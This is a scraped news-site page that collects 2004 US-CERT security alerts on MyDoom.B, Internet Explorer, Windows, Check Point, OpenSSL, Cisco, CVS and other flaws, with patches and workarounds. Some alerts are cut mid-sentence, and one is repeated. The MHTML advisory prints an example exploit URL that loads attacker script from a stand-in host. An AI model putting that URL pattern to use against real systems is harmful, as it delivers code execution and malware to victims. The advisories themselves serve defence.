Tech - Linux/BSD - Apache - Security - Hardware - Gaming - Autos - World - Entertainment - About
|
MDA, Lockheed Martin seek ‘final transition' of LRDR
|
US Coast Guard Airbus MH-65s retire from Arctic mission
|
|
HMS Diamond shoots down Houthi missile in Red Sea
|
Rafale enters Croatian service
|
|
UK explores new radar and IR tech to enhance SDA
|
Italy to enhance SSA with new ground-based sensors
|
|
Update: BAE Systems outlines Type 26 frigate progress amid steelworker shortage
|
Airbus flies RACER high-speed helicopter
|
|
QinetiQ demonstrates jet-to-jet MUM-T for first time in the UK
|
Netherlands, Poland approved for AARGM-ER SEAD/DEAD missiles
|
|
Initial flight trials demonstrate Excalibur FTA ‘fit for purpose‘, says Leonardo
|
UAE inaugurates GlobalEye early warning aircraft
|
|
India's GalaxEye developing satellite with multiple sensors for Earth observation
|
Special Report: Australia to accentuate maritime capabilities amid China's coercion
|
|
Vietnam issues diplomatic note to Malaysia after South China Sea collision
|
Brazilian Army seeks 12 UH-60M Black Hawk helicopters
|
|
Brazil to update A-29 Super Tucano aircraft fleet
|
Brazil to buy additional VBMT-LSR Guaicurus 44 vehicles
|
|
Spain upgrades and acquires more NASAMS systems
|
Iraqi Army Aviation Command identifies itself as CH-5 UAV operator
|
|
General Atomics tests podded guns on Mojave UAV
|
Lockheed Martin secures contract to deliver JABMS to Australia
|
|
New aerial vehicle seen on Chinese H-6 bomber
|
Vietnam outlines intent to procure K9 howitzer
|
|
Austal completes sea trials for Australia's autonomous patrol boat project
|
NewsBone.com
|
|
MyDoom.B Virus
Quick Links To protect your systems from infection by this virus, we recommend that you take the following steps. In addition to these steps, US-CERT encourages home users to review the "Home Network Security" and "Home Computer Security" documents. Emails sent out by Mydoom.B are generated randomly. The From address may also be spoofed to appear as though the message is from a different address. The subject of the message will include one of the following: Not all email messages with these subject lines carry the MyDoom.B virus, some may be legitimate status messages. The message body will include one of the following: The attachment will have one of the following filenames: The filename also contains an extension (.exe, .bat, .scr, .cmd, or .pif). When the attachment is opened, the MyDoom.B virus is launched and the system is infected. It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. You may wish to read CERT Incident Note IN-2003-01 for more information on anti-virus software and security issues. Do not download, install, or run a program unless it was written by a person or company that you trust. Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. The Melissa virus spread precisely because it originated from a familiar email address. In addition, MyDoom.B attempts to spread through file-sharing services like KaZaA. Peer-to-peer file sharing users should be particularly careful of running software sent to them by other users. This is a commonly used method among intruders attempting to build networks of distributed denial-of-service (DDoS) agents. A personal firewall will not necessarily protect your system from an email-borne virus, but a properly configured personal firewall may prevent the virus from downloading additional components or launching attacks against other systems. To confirm that your system has been infected with the MyDoom.B virus, perform the following steps. MyDoom.B overwrites the Windows 'hosts' file. The file it replaces it with will probably prevent your system from accessing your antivirus vendor's web site as well as some other web sites. You can check your hosts file by following these steps: Windows NT/2000/XP Systems MyDoom.B drops several files on an infected computer. The existence of these files is a good indication of infection. Be aware that thereare legitimate Windows files with names similar to those left by the virus. Only files with these names and in these specific directories indicate an infection. Windows NT/2000/XP Systems The MyDoom.B virus also makes some changes to the Windows registry. Users who are unfamiliar with the registry should probably skip this step because it may cause serious damage to the operating system if accidental changes are made. Windows 95/98/Me/NT/2000/XP Systems If your system is infected, you will probably be unable to access your antivirus vendor's web site for assistance due to some changes the virus has made to your system. If this is the case, follow these steps to delete a file installed by the virus (do not do this unless you are infected; it may affect the normal operation of your system): Windows NT/2000/XP Systems After deleting this file, you should be able to access your antivirus vendor's web site, obtain the updates to your antivirus software and perform a full scan of your system. Some antivirus vendors may produce a Removal Tool and make it available on their web site. If your vendor provides such a tool, you may want to use it first. If you are still unsuccessful at removing the virus, contact your antivirus vendor to obtain further assistance with removal and recovery. For additional technical details about this virus, please see US-CERT Technical Alert TA04-028A.html Copyright 2004 Carnegie Mellon University. Terms of use January 28, 2004: Initial release Last updated |
Multiple Vulnerabilities in Microsoft Internet Explorer
Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow attackers in any location to run programs of their choice on your computer using the same privileges as you have.
Patch Information | Problem Description | References Microsoft's Home User Security Bulletin for February 2004 describes three vulnerabilities in Internet Explorer (IE). Note that in addition to IE, any applications that use IE to interpret HTML documents, such as email programs, may present additional ways for these vulnerabilities to be used. A technical description of these vulnerabilities is available from US-CERT in TA04-033A and from Microsoft in MS04-004. Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's Home User Security Bulletin for February 2004. For additional information, and to receive updates on this alert, go to http://www.us-cert.gov. This document is available from <http://www.us-cert.gov/cas/alerts/SA04-033A.html> Copyright 2004 Carnegie Mellon University. Terms of use February 02, 2004: Initial release Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
HTTP Parsing Vulnerabilities in Check Point Firewall-1
The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality.
Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().
Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at: http://xforce.iss.net/xforce/alerts/id/162 The CERT/CC is tracking this issue as VU#790771. This reference number corresponds to CVE candidate CAN-2004-0039. This vulnerability allows remote attackers to execute arbitrary code on affected firewalls with administrative privileges, typically "SYSTEM" or "root". Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at: http://www.checkpoint.com/techsupport/alerts/security_server.html Check Point has reported that their products are only affected by this vulnerability if the HTTP Security Servers feature is enabled. Therefore, affected sites may be able to limit their exposure to this vulnerability by disabling HTTP Security Servers or the Application Intelligence component, as appropriate. This vulnerability was discovered and researched by Mark Dowd of ISS X-Force. This document was written by Jeffrey P. Lanza. This document is available from http://www.us-cert.gov/cas/techalerts/TA04-036A.html 02/05/2004: Initial release |
Multiple Vulnerabilities in Microsoft Windows
It is unclear at this time how many different ways your computer can be compromised using these vulnerabilities, so we recommend you apply the updates below as soon as possible. A technical description of these vulnerabilities is available from US-CERT in TA04-041A and from Microsoft in MS04-007.
Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's updated Home User Security Bulletin for February 2004. For additional information, and to receive updates on this alert, go to http://www.us-cert.gov/cas/alerts/SA04-041A.html This document is available from <http://www.us-cert.gov/cas/alerts/SA04-041A.html> Copyright 2004 Carnegie Mellon University. Terms of use February 10, 2004: Initial release Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Vulnerability in Microsoft Outlook 2002
A technical description of these vulnerabilities is available from US-CERT in TA04-070A and from Microsoft in MS04-009.
Microsoft's Office Security Update for March 2004 links to the necessary patches. This document is available from <http://www.us-cert.gov/cas/alerts/SA04-070A.html> Copyright 2004 Carnegie Mellon University. Terms of use March 10, 2004: Initial release Last updated |
Multiple Vulnerabilities in OpenSSL
VU#288574 - OpenSSL contains null-pointer assignment in do_change_cipher_spec() function
Versions of OpenSSL from 0.9.6c to 0.9.6k inclusive and 0.9.7a to 0.9.7c inclusive contain a null-pointer assignment in the do_change_cipher_spec() function. By performing a specially crafted SSL/TLS handshake, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. VU#484726 - OpenSSL does not adequately validate length of Kerberos tickets during SSL/TLS handshake Versions 0.9.7a, 0.9.7b, and 0.9.7c of OpenSSL do not adequately validate the length of Kerberos tickets (RFC 2712) during an SSL/TLS handshake. OpenSSL is not configured to use Kerberos by default. By performing a specially crafted SSL/TLS handshake with an OpenSSL system configured to use Kerberos, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. OpenSSL 0.9.6 is not affected. VU#465542 - OpenSSL does not properly handle unknown message types OpenSSL prior to version 0.9.6d does not properly handle unknown SSL/TLS message types. An attacker could cause the application using OpenSSL to enter an infinite loop, which may result in a denial of service in the target application. OpenSSL 0.9.7 is not affected. An unauthenticated, remote attacker could cause a denial of service in any application or system that uses a vulnerable OpenSSL SSL/TLS library. Upgrade to OpenSSL 0.9.6m or 0.9.7d. Alternatively, upgrade or apply a patch as specified by your vendor. Note that it is necessary to recompile any applications that are statically linked to the OpenSSL SSL/TLS library. Multiple vendors are affected by different combinations of these vulnerabilities. For updated information, please see the Systems Affected sections of VU#288574, VU#484726, and VU#465542. These vulnerabilities were researched and reported by the OpenSSL Project and the U.K. National Infrastructure Security Co-ordination Centre (NISCC). Feedback can be directed to the authors: Art Manion and Damon Morda. March 18, 2004: Initial release |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Continuing Threats to Home Users
There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities.
Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised.
US-CERT is currently tracking the incident activity related to several pieces of malicious code - Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom. The Phatbot Trojan Horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected a remote attacker will have access to your files and programs. The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message. The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares. The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message. There are steps you can take to better protect your system from these attacks: Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications. US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available. US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices. The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow: For additional information about securing home systems and networks, please see the references below. If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install t Continuing Threats to Home Users Alert (SA04-079A) Original Release date: March 19, 2004 There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities. Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised. US-CERT is currently tracking the incident activity related to several pieces of malicious code - Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom. The Phatbot Trojan Horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected a remote attacker will have access to your files and programs. The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message. The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares. The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message. There are steps you can take to better protect your system from these attacks: Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications. US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available. US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices. The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow: For additional information about securing home systems and networks, please see the references below. If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install the operating system and install patches before connecting back to the network. Sometimes using an anti-virus software package to "clean" the system may not be enough. Authors: Brian B. King, Damon Morda Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler
Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.
US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380. By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content). Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names. Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model. Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively). A malicious web site or email message may contain HTML similar to the following: ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code. Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software. Install a patch Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013. Disable ITS and MHTML protocol handlers Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml} Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed. Follow good Internet security practices These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013. Disable Active scripting and ActiveX controls Do not follow unsolicited links Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. Maintain updated anti-virus software Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Please see Microsoft Security Bulletin MS04-013. This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration. Feedback can be directed to the author: Art Manion. April 8, 2004: Initial release |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Summary of Windows Security Updates for April 2004
A technical description of these vulnerabilities is available from US-CERT in TA04-104A and from Microsoft in MS04-011, MS04-012, MS04-013, and MS04-014.
Follow the procedures outlined in Microsoft's Windows Security Updates for April 2004. Feedback about this alert should be sent to the author, Mindi McDowell, at "US-CERT Security Alerts" at <mailto:cert@cert.org>. Please include the Subject line "SA04-104A Feedback VU#667571". Copyright 2004 Carnegie Mellon University. Terms of use April 13, 2004: Initial release Last updated |
Multiple Vulnerabilities in Microsoft Products
Impact
Remote attackers could execute arbitrary code on vulnerable systems.
Systems affected Vulnerability identifiers CAN-2003-0533 CAN-2003-0663 CAN-2003-0719 CAN-2003-0806 CAN-2003-0906 CAN-2003-0907 CAN-2003-0908 CAN-2003-0909 CAN-2003-0910 CAN-2004-0117 CAN-2004-0118 CAN-2004-0119 CAN-2004-0120 CAN-2004-0123 This bulletin addresses several new vulnerabilities affecting the systems listed below. These vulnerabilities are in Microsoft Windows Remote Procedure Call (RPC) and Distributed Component Object Model (DCOM). Impact Remote attackers could execute arbitrary code on vulnerable systems. Systems affected Vulnerability identifiers CAN-2003-0813 CAN-2004-0116 CAN-2003-0807 CAN-2004-0124 This bulletin addresses a vulnerability affecting the systems listed below. The vulnerability affects the Microsoft Windows MHTML Protocol handler and any applications that use it, including Microsoft Outlook and Internet Explorer. This vulnerability has been assigned VU#323070 and CAN-2004-0380. Impact Remote attackers could execute arbitrary code on vulnerable systems. Systems affected Note: This issue affects systems with Outlook Express installed. Outlook Express is installed by default on most (if not all) current versions of Microsoft Windows. This bulletin addresses a vulnerability affecting the systems listed below. There is a buffer overflow vulnerability in Microsoft's Jet Database Engine (Jet). An attacker could take control of a vulnerable system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability has been assigned VU#740716 and CAN-2004-0197. Impact Remote attackers could execute arbitrary code on vulnerable systems. Systems affected Microsoft has released a patch that addresses the cross-domain vulnerability discussed in TA04-099A: Vulnerability in Internet Explorer ITS Protocol Handler. US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380. The patches and further information about the vulnerability are available in Microsoft Security Bulletin MS04-013. MS04-013 is titled Cumulative Security Update for Outlook Express. Since most (if not all) current Windows systems have Outlook Express installed by default, and the MHTML protocol handler is part of the Outlook Express software package, most (if not all) Windows systems should be considered vulnerable. TA04-099A and VU#323070 focused on the ITS protocol handlers; however, the latent vulnerability appears to be in the MHTML handler shipped as part of Outlook Express. These documents have been updated. Several of the issues identified by Microsoft have been described as Critical in nature. Each bulletin contains at least one vulnerability which may allow remote attackers to execute arbitrary code on affected systems. The privileges gained would depend on the security context of the software and vulnerability exploited. Please see the following site for more information about appropriate remediation. Windows Security Updates for April 2004 This appendix contains information provided by vendors for this technical alert. As vendors report new information to US-CERT, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Windows Security Updates for April 2004 Feedback: US-CERT Technical Alerts April 13, 2004: Initial release |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Cisco IOS SNMP Message Handling Vulnerability
The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices. There are several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send both solicited and unsolicited alerts. These messages use UDP to communicate network information between SNMP agents and managers.
There is a vulnerability in Cisco's IOS SNMP service in which attempts to process specific SNMP messages are handled incorrectly. This may potentially cause the device to reload.
Typically, ports 161/udp and 162/udp are used during SNMP operations to communicate. In addition to these well-known ports, Cisco IOS uses a randomly selected UDP port in the range from 49152/udp to 59152/udp (and potentially up to 65535) to listen for other types of SNMP messages. While SNMPv1 and SNMPv2c formatted messages can trigger this vulnerability, the greatest risk is exposed when any SNMPv3 solicited operation is sent to a vulnerable port.
Cisco notes in their advisory: Cisco is tracking this issue as CSCed68575. US-CERT is tracking this issue as VU#162451. A remote, unauthenticated attacker could cause the vulnerable device to reload. Repeated exploitation of this vulnerability could lead to a sustained denial of service condition. Cisco has published detailed information about upgrading affected Cisco IOS software to correct this vulnerability. System managers are encouraged to upgrade to one of the non-vulnerable releases. For additional information regarding availability of repaired releases, please refer to the "Software Versions and Fixes" section of the Cisco Security Advisory. Cisco recommends a number of workarounds, including disabling SNMP processing on affected devices. For a complete list of workarounds, see the Cisco Security Advisory.
This appendix contains information provided by vendors for this Please refer to Cisco Security Advisory: "Vulnerabilities in SNMP Message Processing". US-CERT thanks Cisco Systems for notifying us about Feedback can be directed to the authors: Jeff Havrilla, Shawn Hernan, Damon Morda The latest version of this document can be found at: http://www.us-cert.gov/cas/techalerts/TA04-111B.html Copyright 2004 Carnegie Mellon University. Terms of use: http://www.us-cert.gov/legal.html
April 20, 2004: Initial release Last updated
|
Vulnerabilities in TCP
Paul Watson has performed the statistical analysis of this attack when the Since TCP is an insecure protocol, it is possible to inject The Border Gateway Protocol (BGP) is used to exchange routing In a TCP session, the endpoints can negotiate a TCP Window size. When To protect against such injections, RFC 2385 provides a method of US-CERT is tracking this issue as VU#415294. This NISCC is tracking this issue as Vulnerability Advisory 236929. Sustained exploitation of the TCP injection vulnerability with regard to Since the TCP/IP Initial Please see your vendor's statement regarding the availability of TCP initial sequence numbers were not designed to provide proof against The key idea with an The solutions presented above have the desirable attribute of not Ingress filtering manages You can configure your BGP routers to only accept packets on a specific Servers are typically the only machines that need to accept inbound In the network usage policy of many sites, there are few reasons for Thus, ingress filtering should be performed at the border to prohibit In this fashion, the effectiveness of many intruder scanning techniques
Complex networks can benefit by separating data channels and control Egress filtering manages the flow of traffic as it leaves a network There is typically limited need for machines providing public services to In the case of BGP, only your BGP routers should be establishing For vendor information, please see NISCC Vulnerability Advisory 236929 US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us Feedback can be directed to the US-CERT
April 20, 2004: Initial release Last updated
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
CVS Heap Overflow Vulnerability
US-CERT is tracking this issue as VU#192038. This reference number corresponds to CVE candidate CAN-2004-0396.
An authenticated client could exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of the CVS server process. It is possible for an anonymous user with read-only access to exploit a vulnerable server as they are authenticated through the cvspserver process. In addition to compromising the system running CVS, there is a significant secondary impact in that source code maintained in CVS repositories could be modified to include Trojan horses, backdoors, or other malicious code. Apply Patch or Upgrade Apply the appropriate patch or upgrade as specified by your vendor. For vendor specific responses, please see your vendor's website or Vulnerability Note VU#192038. This issue has been resolved in Stable CVS Version 1.11.16 and CVS Feature Version 1.12.8. Disable CVS Server Until a patch or upgrade can be applied, consider disabling the CVS server. Block or Restrict Access Block or restrict access to the CVS server from untrusted hosts and networks. The CVS server typically listens on 2401/tcp, but may use another port or protocol. Note that some of these workarounds will only limit the scope and impact of possible attacks. Note also that anonymous (read-only) access is sufficent to exploit this vulnerability. US-CERT thanks Stefan Esser of e-matters for reporting this problem and for information used to construct this advisory. Feedback can be directed to the authors: Jason A. Rafail and Damon Morda May 26, 2004: Initial release |
SQL Injection Vulnerabilities in Oracle E-Business Suite
Note that no authentication mechanisms of Oracle E-Business Suite will US-CERT is tracking this issue as VU#961579.
An unauthenticated attacker could exploit this vulnerability to execute Apply Patch or Upgrade According to the Oracle Security http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=274375.1
Note that the above link requires registration to Oracle Metalink. To US-CERT thanks Stephen Kost of Integrigy Corporation for reporting this Feedback can be directed to the author: Jason
June 8, 2004: Initial release Last updated
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Cross-Domain Redirect Vulnerability in Internet Explorer
This issue has been assigned CVE CAN-2004-0549.
By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. Publicly available exploit code exists for this vulnerability, and US-CERT has monitored incident reports that indicate that this vulnerability is being actively exploited. Microsoft has released a cumulative patch (867801) in Security Bulletin MS04-025 which addresses this issue. Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC1) includes these and other security enhancements for IE. Do not follow unsolicited links Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases. Maintain updated anti-virus software Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Public incidents related to this vulnerability were reported by Rafel Ivgi. Thanks to Jelmer for further research and analysis. Feedback can be directed to the author: Art Manion. June 11, 2004: Initial release |
Cross-Domain Vulnerability in Internet Explorer
Micrososft has released a patch to resolve this issue. It is available from Microsoft Windows Update or Microsoft Security Bulletin MS04-025.
Instructions for disabling Active scripting and ActiveX controls in the Internet Zone can be found in the Malicious Web Scripts FAQ.
Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. Author: Michael Durkota Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Multiple Vulnerabilities in ISC DHCP 3
VU#654390 discusses C For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP All versions of ISC DCHP 3, including all snapshots, betas, and release US-CERT is tracking these issues as VU#317350, which has been Exploitation of these vulnerabilities may cause a denial-of-service Apply patches or upgrade These issues have been resolved in ISC DHCP 3.0.1rc14. US-CERT thanks Gregory Duchemin and Solar Designer for Feedback can be directed to the author: Jason
June 22, 2004: Initial release Last updated
|
Important Internet Explorer Update Available
Microsoft has released a security update for IE that provides increased protection against this type of attack. Note that this update may not prevent attacks in all cases.
US-CERT recommends that users install the update from the Microsoft Download Center (KB870669) or the Windows Update web site. In addition, US-CERT strongly recommends that users modify IE security settings according to the instructions in the Malicious Web Scripts FAQ. Further information is available from Microsoft in What You Should Know About Download.Ject. Author: Art Manion Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Internet Explorer Update to Disable ADODB.Stream ActiveX Control
An ADO stream object contains methods for reading and writing binary files and text files. When an ADO stream object is combined with known security vulnerabilities in Internet Explorer, a Web site could execute scripts from the Local Machine zone. To help protect your computer from this kind of attack, you can manually modify your registry.
It is important to note that there may be other ways for an attacker to write arbitrary data or to execute commands without relying on the ADODB.Stream control. Further information is available from Microsoft in What You Should Know About Download.Ject. Instructions for securing IE and other web browsers against malicious web scripts are available in the Malicious Web Scripts FAQ. By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. Recent incident activity known as Download.Ject (also JS.Scob.Trojan, Scob, JS.Toofeer) uses cross-domain vulnerabilities and the ADODB.Stream control to install software that steals sensitive financial information. Until a complete solution is available from Microsoft, consider the following workarounds. Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC2) includes these and other security enhancements for IE. Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases. For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients. One way to disable the ADODB.Stream control is to apply the update from the Microsoft Download Center (KB870669) or the Windows Update web site. The ADODB.Stream control can also be disabled by modifying the Windows registry as described in Microsoft Knowledge Base Article 870669. Both of these methods disable ADODB.Stream by setting the kill bit for the control in the Windows registry. Note that disabling the ADODB.Stream control does not directly address any cross-domain vulnerabilities, nor does it prevent attacks. This workaround prevents a well-known and widely used technique for writing arbitrary data to disk after a cross-domain vulnerability has been exploited. There may be other ways for an attacker to write arbitrary data or execute commands. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Please see What You Should Know About Download.Ject and Microsoft Knowledge Base Article 870669. Feedback can be directed to the author: Art Manion July 2, 2004: Initial release |
